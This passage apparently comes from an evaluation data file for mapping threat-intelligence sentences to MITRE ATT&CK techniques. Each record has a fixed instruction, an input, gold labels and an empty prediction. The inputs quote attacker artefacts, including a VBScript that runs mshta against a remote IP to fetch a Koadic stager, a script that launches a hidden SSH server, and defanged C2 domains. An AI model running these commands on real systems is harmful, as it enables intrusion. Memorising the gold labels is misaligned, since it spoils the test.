+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Cadelle and Chafer are most active during the day time within Iran\u2019s time zone and primarily operate during Iran\u2019s business week (Saturday through Thursday)",
+ "gold": [
+ "T1124"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This function is able to obfuscate code so that every iteration of the code is presented differently",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The code comparison specifically shows the HighShell code including a salt variable containing di2zag7wZHTK9YR0NGq, which is not present within the TwoFace code on the left",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"Here is the code:The goal of this code is to get information from the properties of the document (\"\"Subject\"\", \"\"Company\"\", \"\"Category\"\", \"\"Hyperlink base\"\" and finally \"\"Comments\"\")\"",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Visual Basic macro performs the following tasks: Opens a handle to the malicious document to read the encoded CAB file Decodes the CAB file and writes it to the disk at %temp%\\setup.cab Encoded CAB file in the Word document",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The most interesting part is the decrypted C&C configuration, as can be seen in the image below",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Backdoor analysis The main loop of the backdoor has two main functions, infoClient and runHandle",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "To decode this information, BADNEWS takes the following steps: Base64-decode the string Perform the decoding cipher used in previous versions Base64-decode the result Decrypt the result using the Blowfish algorithm and a static key A script, which is included in the Appendix, will decrypt data from these dead drop resolvers",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The unique strings mainly consist of \u201cMobile/BADDAD\u201c, \u201cMobile/7B405\u201d and \u201cE9BC3BD76216AFA560BFB5ACAF5731A3\u201d",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The decrypted contents of the log file adhere to the format in Figure 22",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Decrypted OwaAuth log file format",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"\"\"Are you Happy?\"\" campaign.\"\"FreeMilk\"\" campaign.\"\"North Korean Human Rights\"\" campaign.\"\"Evil New Year 2018\"\" campaign.On January 2nd of 2018, the \"\"Evil New Year 2018\"\" was started\"",
+ "gold": [
+ "T1543",
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 2: AuditCred/ROptimizer Service If successfully installed, this particular backdoor poses quite a threat to its target",
+ "gold": [
+ "T1543",
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files.\u00a0 The file\u2019s path",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The config file provides download instructions for the loader",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Using this information, they can decide to explore further or instruct the compromised computer to download additional malware",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Responds to the IRC server via PRIVMSG with \u201cDownload\u00a0 Success :FilePath=\u201d or \u201cDownload Fail\u201d if unsuccessful",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 4: Downloading second stage Seminar.rtf The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Anyconnect[.]stream Bigip[.]stream Fortiweb[.]download Kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win The listed C2 servers all resolved to IPs belonging to a service provider in China at 1.2.9.0/24, which is the IP address used by the C2 server to send a cancel communications message to the end system",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "2 Downloads a file to the system",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This includes, but is not limited to, the following: AES encryption of network communication File management Functionality to download, upload, and execute files Keylogging Remote desktop access Remote webcam viewing Reverse proxy Browser and FTP client password recovery The images below are what a target user opening a malicious RTF document would see from within Microsoft Word",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3)",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Use of PowerShell to download additional tools",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The shellcode of the embedded object is designed to download an image, which is, in fact, a new shellcode used to decode an embedded executable",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "We recently mentioned this tool in another report on April 16, as this variant of the BONDUPDATER tool used DNS tunneling to communicate with its C2, specifically using TXT queries to receive information from the C2 server",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Server Command and control server that communicates via DNS tunneling Panel Graphical User Interface that allows actors to issue commands, upload and download files to Agents via the Server Table 2",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Poison Frog server handles both the HTTP and DNS tunneling channels used by the hUpdater.ps1 and dUpdater.ps1 scripts",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Its C2 is based on IIS using .asp technology to handle the victims\u2019 HTTP requests",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Later variants upload the file to a web server via an HTTP post command",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "All subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated HTTP requests",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "To obtain strings to treat as commands, the payload will issue a series of DNS queries to resolve domains with the following structure: --. The C2 server will provide responses to these queries that contain answers in IPv4 or IPv6 addresses depending on the type of DNS query the payload uses to communicate with its C2 server",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure:http:///resp?AAZ The upload command (2) writes data provided by the C2 to a specified file",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "We have seen the following HTTP POST parameters within the Zebrocy C++ samples: porg structOne oq volume DDE Details The author of the DDE document used in the February 2018 attacks used some obfuscation techniques in an attempt to evade detection",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "XAgent uses HTTP requests to communicate with its C2 servers, which allows the threat actor to interact with the compromised system",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "For instance, when using this string we observed DNS queries for \u201capple-search.infoclose\u201d, as the string \u201cclose\u201d was supposed to be the next portion of the C2 URL",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "In the order to run the SSH server, the attackers created a VBS file with the following content: Set WshShell = CreateObject(\u201cWScript.Shell\u201d) WshShell.CurrentDirectory = \u201cC:\\WINDOWS\\TEMP\\Dropbear\\\u201d WshShell.Run \u201cdropbear.exe -r rsa -d dss -a -p 6789\u201d, 0, false As is evident here, the SSH server will accept connections on port number 6789",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext: set objshell = createobject(\\\"\"wscript.shell\\\"\")objshell.run \\\"\"mshta hxxp://86.106.131.177:6500/zIZFh\\\"\",vbhide The Koadic C2 server will respond to this request with Javascript code that acts as the Koadic staging payload, which allows the actor to run additional Koadic modules on the end system to carry out their post-exploitation activities\"",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified",
+ "gold": [
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
